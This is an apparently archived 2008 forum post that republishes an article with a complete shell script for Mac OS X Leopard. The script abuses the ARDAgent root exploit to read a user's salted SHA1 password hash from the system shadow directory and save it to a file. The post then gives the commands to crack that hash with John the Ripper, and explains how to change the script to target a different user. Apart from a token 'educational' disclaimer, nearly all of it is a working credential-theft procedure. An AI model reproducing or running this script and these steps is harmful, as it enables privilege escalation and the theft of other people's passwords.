[Security] Dumping and Bruteforcing Password Hashes on Leopard

sam · #1 (**permalink**) 07-09-2008, 02:06 AM

From a anonymous contributor, this interesting article:

Dumping and Bruteforcing Password Hashes on Leopard

=============================================
====This is for educational purposes only, do not use maliciously====
=============================================

Like on Tiger, salted SHA1 hashes of the password can be dumped. But there is one catch: the user must have root. This can be done by using the newly found ARDAgent exploit. Attached to this post is a .sh script archived in a zip file. This script WILL NOT work if the ARDAgent exploit has been fixed on the target computer. To run the script, do the following in Terminal (/Applications/Utilities):

cd /path/to/the/folder/containing/the/script/
chmod +x passdump.sh
./passdump.sh

From there, you will see a lot of information, and then a file (named theUserName.hash.txt) will be written to your desktop containing the username of the password that is dumped and the salted SHA1 hash contained with this username. This txt file can be run through a bruteforce application named John the Ripper (http://www.openwall.com/john/). A modified build is needed for detecting this hash correctly. This build is found here:

ftp://ftp.openwall.com/pub/projects/...7.2-macosx.zip

Once you download this, just unzip it, and do the following in Terminal:

cd <Drag the unzipped folder into the window>
cd run
./john --format=salt-sha1 ~/Desktop/theUserName.hash.txt

From there, John the Ripper will bruteforce the password. The time for it to get the password will spend on the size and security of the password. Make sure you replace theUserName in the Terminal commands with the one of the file on your desktop. John should say:
Loaded 1 password hash (Salt SHA1 [salt-sha1])

Once John has gotten your password, it will display it as follows:
thePassword (theUserName)

One thing to note: If you want to dump the password of a user that is not the current user, then change this line in the passdump.sh:

CURRENTUSER=`whoami`

to:

CURRENTUSER="theUserNameToDump"

Remember, this is for educational purposes only, do not use it maliciously.

Here is the script, just put it into a file named passdump.sh:

Code:

#!/bin/sh

echo "\nWelcome."
echo "====================================================================="
echo "====This is for educational purposes only, do not use maliciously===="
echo "====================================================================="
sleep 2
echo "For this to work correctly, the ARDAgent exploit must be enabled."
echo " "
echo "Testing to see if the exploit is enabled..."
echo " "

EXPUSER=`osascript -e 'tell application "ARDAgent" to do shell script "whoami"' 2> /dev/null`

if [ "$EXPUSER" = "root" ]; then
echo "The exploit is enabled, continuing..\n"

CURRENTUSER=`whoami`

if [ "$CURRENTUSER" = "root" ]; then
echo "Getting password for user 'root' is not allowed."
echo "Please run this without being root."
exit 0
fi

echo "Getting password for the user $CURRENTUSER\n"

USERUID=`dscl localhost -read /Search/Users/$CURRENTUSER | grep GeneratedUID | sed s/GeneratedUID:\ //`

echo "The UID of $CURRENTUSER is $USERUID"

SALTEDSHA=`sh -c "osascript -e 'tell application \"ARDAgent\" to do shell script \"cat /var/db/shadow/hash/$USERUID | cut -c169-216\"'" 2> /dev/null` 

echo "The salted SHA1 hash is $SALTEDSHA\n"
echo "$CURRENTUSER:$SALTEDSHA" > ~/Desktop/$CURRENTUSER.hash.txt
echo "The password was written to ~/Desktop/$CURRENTUSER.hash.txt, which can be run through a modified John the Ripper, found here:"
echo "ftp://ftp.openwall.com/pub/projects/john/contrib/osx/john-1.7.2-macosx.zip"

else
echo "The ARDAgent exploit is not enabled, so therefore, this will not work."
exit 0
fi